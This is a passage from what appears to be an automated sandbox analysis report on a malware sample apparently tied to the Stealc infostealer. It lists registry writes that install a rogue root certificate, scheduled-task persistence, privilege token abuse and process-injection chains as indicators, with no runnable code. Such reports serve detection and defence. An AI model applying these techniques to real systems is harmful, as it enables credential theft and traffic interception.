f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	ujqwfi.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	RegAsm.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	T3USPjGDkV.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	T3USPjGDkV.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	qvipgc.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	qvipgc.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
1136	schtasks.exe
1920	schtasks.exe
1932	schtasks.exe
3672	schtasks.exe
1768	schtasks.exe
2588	schtasks.exe
2664	schtasks.exe
2232	schtasks.exe
3460	schtasks.exe
1588	schtasks.exe
1864	schtasks.exe
2108	schtasks.exe
3732	schtasks.exe
3200	schtasks.exe
3092	schtasks.exe
3604	schtasks.exe
3548	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

explorer.exe

pid process

1720 explorer.exe

pid	process
1720	explorer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeaxplong.exeT3USPjGDkV.exestealc_default2.exeRegAsm.exepenis.exeMovqcuUWuS.exeWaters.pifpowershell.exeRegAsm.exepowershell.exe33a79e7ec3.exepowershell.exepowershell.exepowershell.exepowershell.exebundle.exeexplorer.exepowershell.exepowershell.EXE

pid	process
1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
796	axplong.exe
920	T3USPjGDkV.exe
2088	stealc_default2.exe
1108	RegAsm.exe
1108	RegAsm.exe
1108	RegAsm.exe
1032	penis.exe
2088	stealc_default2.exe
2248	MovqcuUWuS.exe
2248	MovqcuUWuS.exe
2248	MovqcuUWuS.exe
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
1056	RegAsm.exe
2540	powershell.exe
1768	33a79e7ec3.exe
1056	RegAsm.exe
1056	RegAsm.exe
2644	powershell.exe
1548	powershell.exe
1668	powershell.exe
2688	powershell.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
856	bundle.exe
1720	explorer.exe
856	bundle.exe
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
3596	powershell.exe
3520	powershell.EXE
3520	powershell.EXE
3520	powershell.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

e0e4b0e858.exe

pid process

1604 e0e4b0e858.exe

pid	process
1604	e0e4b0e858.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

T3USPjGDkV.exepenis.exeRegAsm.exeMovqcuUWuS.exetasklist.exetasklist.exepowershell.exeexplorer.exeRegAsm.exepowershell.exeWMIC.exeacentric.exepowershell.exepowershell.exepowershell.exepowershell.exefirefox.exebundle.exefirefox.exepowershell.exeexplorer.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	920	T3USPjGDkV.exe
Token: SeBackupPrivilege	920	T3USPjGDkV.exe
Token: SeSecurityPrivilege	920	T3USPjGDkV.exe
Token: SeSecurityPrivilege	920	T3USPjGDkV.exe
Token: SeSecurityPrivilege	920	T3USPjGDkV.exe
Token: SeSecurityPrivilege	920	T3USPjGDkV.exe
Token: SeDebugPrivilege	1032	penis.exe
Token: SeBackupPrivilege	1032	penis.exe
Token: SeSecurityPrivilege	1032	penis.exe
Token: SeSecurityPrivilege	1032	penis.exe
Token: SeSecurityPrivilege	1032	penis.exe
Token: SeSecurityPrivilege	1032	penis.exe
Token: SeDebugPrivilege	1108	RegAsm.exe
Token: SeDebugPrivilege	2248	MovqcuUWuS.exe
Token: SeDebugPrivilege	2384	tasklist.exe
Token: SeDebugPrivilege	1600	tasklist.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	1720	explorer.exe
Token: SeDebugPrivilege	1056	RegAsm.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeIncreaseQuotaPrivilege	3024	WMIC.exe
Token: SeSecurityPrivilege	3024	WMIC.exe
Token: SeTakeOwnershipPrivilege	3024	WMIC.exe
Token: SeLoadDriverPrivilege	3024	WMIC.exe
Token: SeSystemProfilePrivilege	3024	WMIC.exe
Token: SeSystemtimePrivilege	3024	WMIC.exe
Token: SeProfSingleProcessPrivilege	3024	WMIC.exe
Token: SeIncBasePriorityPrivilege	3024	WMIC.exe
Token: SeCreatePagefilePrivilege	3024	WMIC.exe
Token: SeBackupPrivilege	3024	WMIC.exe
Token: SeRestorePrivilege	3024	WMIC.exe
Token: SeShutdownPrivilege	3024	WMIC.exe
Token: SeDebugPrivilege	3024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3024	WMIC.exe
Token: SeRemoteShutdownPrivilege	3024	WMIC.exe
Token: SeUndockPrivilege	3024	WMIC.exe
Token: SeManageVolumePrivilege	3024	WMIC.exe
Token: 33	3024	WMIC.exe
Token: 34	3024	WMIC.exe
Token: 35	3024	WMIC.exe
Token: SeDebugPrivilege	2516	acentric.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeDebugPrivilege	1668	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	1064	firefox.exe
Token: SeDebugPrivilege	1064	firefox.exe
Token: SeDebugPrivilege	856	bundle.exe
Token: SeDebugPrivilege	1720	explorer.exe
Token: SeDebugPrivilege	3564	firefox.exe
Token: SeDebugPrivilege	3564	firefox.exe
Token: SeDebugPrivilege	3596	powershell.exe
Token: SeDebugPrivilege	2920	explorer.exe
Token: SeDebugPrivilege	3520	powershell.EXE
Token: SeDebugPrivilege	2600	powershell.EXE
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	3316	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3316	WMIC.exe
Token: SeSecurityPrivilege	3316	WMIC.exe
Token: SeTakeOwnershipPrivilege	3316	WMIC.exe
Token: SeLoadDriverPrivilege	3316	WMIC.exe
Token: SeSystemtimePrivilege	3316	WMIC.exe
Token: SeBackupPrivilege	3316	WMIC.exe
Token: SeRestorePrivilege	3316	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeNework.exeWaters.pife0e4b0e858.exefirefox.exefirefox.exe

pid	process
1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
2468	Nework.exe
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
3564	firefox.exe
3564	firefox.exe
3564	firefox.exe
3564	firefox.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

Waters.pife0e4b0e858.exefirefox.exefirefox.exe

pid	process
2600	Waters.pif
2600	Waters.pif
2600	Waters.pif
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1064	firefox.exe
1064	firefox.exe
1064	firefox.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
3564	firefox.exe
3564	firefox.exe
3564	firefox.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe
1604	e0e4b0e858.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

pid process

1720 explorer.exe
1720 explorer.exe
2920 explorer.exe
3384 explorer.exe
2572 explorer.exe
2520 explorer.exe
3708 explorer.exe

pid	process
1720	explorer.exe
1720	explorer.exe
2920	explorer.exe
3384	explorer.exe
2572	explorer.exe
2520	explorer.exe
3708	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exeaxplong.exegold.execrypteda.exeNework.exeneedmoney.exe

description	pid	process	target process
PID 1728 wrote to memory of 796	1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe	axplong.exe
PID 1728 wrote to memory of 796	1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe	axplong.exe
PID 1728 wrote to memory of 796	1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe	axplong.exe
PID 1728 wrote to memory of 796	1728	dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe	axplong.exe
PID 796 wrote to memory of 2172	796	axplong.exe	gold.exe
PID 796 wrote to memory of 2172	796	axplong.exe	gold.exe
PID 796 wrote to memory of 2172	796	axplong.exe	gold.exe
PID 796 wrote to memory of 2172	796	axplong.exe	gold.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 2172 wrote to memory of 1108	2172	gold.exe	RegAsm.exe
PID 796 wrote to memory of 2124	796	axplong.exe	crypteda.exe
PID 796 wrote to memory of 2124	796	axplong.exe	crypteda.exe
PID 796 wrote to memory of 2124	796	axplong.exe	crypteda.exe
PID 796 wrote to memory of 2124	796	axplong.exe	crypteda.exe
PID 2124 wrote to memory of 920	2124	crypteda.exe	T3USPjGDkV.exe
PID 2124 wrote to memory of 920	2124	crypteda.exe	T3USPjGDkV.exe
PID 2124 wrote to memory of 920	2124	crypteda.exe	T3USPjGDkV.exe
PID 2124 wrote to memory of 920	2124	crypteda.exe	T3USPjGDkV.exe
PID 2124 wrote to memory of 2248	2124	crypteda.exe	MovqcuUWuS.exe
PID 2124 wrote to memory of 2248	2124	crypteda.exe	MovqcuUWuS.exe
PID 2124 wrote to memory of 2248	2124	crypteda.exe	MovqcuUWuS.exe
PID 2124 wrote to memory of 2248	2124	crypteda.exe	MovqcuUWuS.exe
PID 796 wrote to memory of 2468	796	axplong.exe	Nework.exe
PID 796 wrote to memory of 2468	796	axplong.exe	Nework.exe
PID 796 wrote to memory of 2468	796	axplong.exe	Nework.exe
PID 796 wrote to memory of 2468	796	axplong.exe	Nework.exe
PID 2468 wrote to memory of 1512	2468	Nework.exe	Hkbsse.exe
PID 2468 wrote to memory of 1512	2468	Nework.exe	Hkbsse.exe
PID 2468 wrote to memory of 1512	2468	Nework.exe	Hkbsse.exe
PID 2468 wrote to memory of 1512	2468	Nework.exe	Hkbsse.exe
PID 796 wrote to memory of 2088	796	axplong.exe	stealc_default2.exe
PID 796 wrote to memory of 2088	796	axplong.exe	stealc_default2.exe
